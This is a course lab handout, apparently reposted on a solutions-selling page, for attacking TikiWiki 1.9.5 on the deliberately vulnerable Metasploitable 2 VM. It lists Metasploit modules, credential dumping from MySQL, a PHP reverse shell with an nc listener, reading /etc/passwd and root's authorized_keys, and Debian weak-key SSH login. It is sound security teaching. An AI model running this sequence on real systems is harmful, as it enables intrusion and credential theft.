Starting from:
$30

$24

Lab 2 Metasploitable tikiwiki Solution




Goal: To use Metasploit to exploit the vulnerabilities of tikiwiki 1.9.5, and based on this understand the penetration process.




Instructions: Please refer to the class demo and the tutorial (https://blog.g0tmi1k.com/2010/07/metasploitable-tikiwiki/), and hand in the deliverable with required screenshots.




Deliverable: A lab report, an electronic submission to SacCT, is expected to explain all the commands that you use, and include the screen shots when you receive the response of command executions. A demo may be requested when necessary.




Downloading and installation of Metasploitable, which is an intentionally vulnerable Linux virtual machine that you can download from below website (http://sourceforge.net/projects/metasploitable/files/Metasploitable2/);



Downloading and installation of Kali, which is a Linux distribution designed for penetration (https://www.kali.org/);



The virtual machines can be hosted based on vmware or virtualbox. Configure the network in vmware/virtualbox setting to make them accessible to each other.



Scanning your network to find out the IP of the web server and exploring whether tikiwiki is an alive service on the web server;



Stealing the username and password for access into tikiwiki;



Creating a reverse shell connection with the web server;



Stealing the public key stored in .ssh/authorized_keys and using it to get access into the web server via ssh.



Requirement: The report will all be evaluated based on the following grading criteria.




Correctness
25%
Completeness
25%
Clarity
25%
Quality of English writing
25%






Appendix-Set-up:
The lab has been tested to work successfully for Kali versions through v1.1.0 (you can check your Kali version by command lsb_release -a), metasploitable 2, Dirbuster v1.0, based on VMware Workstation 11.0.0 build-2305329;



When opening the virtual machines, please choose “host-only: a private network shared with the host” in Virtual Machine Settings-Network Adaptor-Network Connection;



When you have network connection problem, VMware-Edit-Virtual Network Editor can help you restore defaults of VMnets;



You can also find Dirbuster through: Applications - Kali Linux - Web Applications - Web Crawlers - dirbuster;



On the operating system Metasploitable 2, mysql was configured to have no password for the root. However, tikiwiki requires mysql’s password for root should be “root”. (Using command ls –al|grep setup in the directory “/var/www/tikiwiki” you can find tiki-setup_base.php where you can further get to know that db/local.php is the basic configuration for database prerequisite. Here, you will find the password that tikiwiki will give mysql is “root”.)



So, we need to either delete the password or change mysql to have “root” as the password. The command for the latter case is: mysql –u root; set password = PASSWORD('root'); or update user set password=PASSWORD("root") where User='root'; flush privileges;




When you want to connect to Internet, you can create another network adaptor in the VM settings and set it to NAT mode. You need to open the VMware with administrator privilege to get this done.









Appendix-Commands (parameters like IP may be different due to your settings):




nmap 192.168.203.1/24




firefox 192.168.203.128




cd /usr/share/dirbuster




Note: command locate dirbuster can find it on different versions java -jar DirBuster-*.jar -u http:// 192.168.203.128




Note: please disable “be recursive” and “brute force files”; choose 50 threads; choose directory-list-2.3-small.txt




firefox 192.168.203.128/tikiwiki




msfconsole




Note: minimum memory-1024 MB




search tikiwiki




use auxiliary/admin/tikiwiki/tikidblib




set RHOST 192.168.203.128




exploit




firefox - www.exploit-db.com - TikiWiki (2701).




firefox 192.168.1.105/tikiwiki/ - 192.168.1.105/tikiwiki/tiki-listpages.php?offset=0&sort_mode=




Note: this is to get to know the hostname, username and password for access to mysql




mysql -h 192.168.203.128 -u root -p




show databases;




use tikiwiki195;




show tables;




select * from users_users;




select login, password from users_users;




Note: this is to know the user name and password for login into tikiwiki




firefox-login into tikiwiki;




php reverse shell




php-reverse-shell.php - reverseshell.php




reverseshell.php - Replace: 127.0.0.1 with 192.168.203.129 [Our IP]. Replace: 1234 with 4321.
Upload the reverseshell.php to tikiwiki server; nc -v -l -p 4321

firefox-192.168.203.128/tikiwiki/backups/reverseshell.php whoami




hostname




cat /etc/passwd




search tikiwiki




use exploit/unix/webapp/tikiwiki_graph_formula_exec




show options




show payloads




set payload generic/shell_bind_tcp




show options




exploit




ls




whoami




cat /etc/passwd




ls -la /root




ls -la /root/.ssh




cat /root/.ssh/authorized_keys




firefox - www.exploit-db.com - Debian OpenSSL Predictable (5720) -




http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (suggested to use wget to




download in a virtual machine environment)




tar jxvf debian_ssh_rsa_2048_x86.tar.bz2

cd rsa/2048




grep -lr




AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbp




G70lShHQqldJkcteZZdPFSbW76IUiPR0Oh




WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOW




WTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bz




p0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP




Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf




1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub




ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.203.128




Note: it’s OK to see something like “public key blacklisted (see ssh-vulnkey(1)); refusing to send it”. That’s because Kali has already enhanced the security by blacklisting the usage of vulnerable keys. It’s good to observe this as an example of security enhancement in reality.




If you are using Kali v1.1, you can find the blacklist in /usr/share/ssh/blacklist.RSA-2048; but if you are using backtrack 4 or Kali v2, you will not see the above message at all.

More products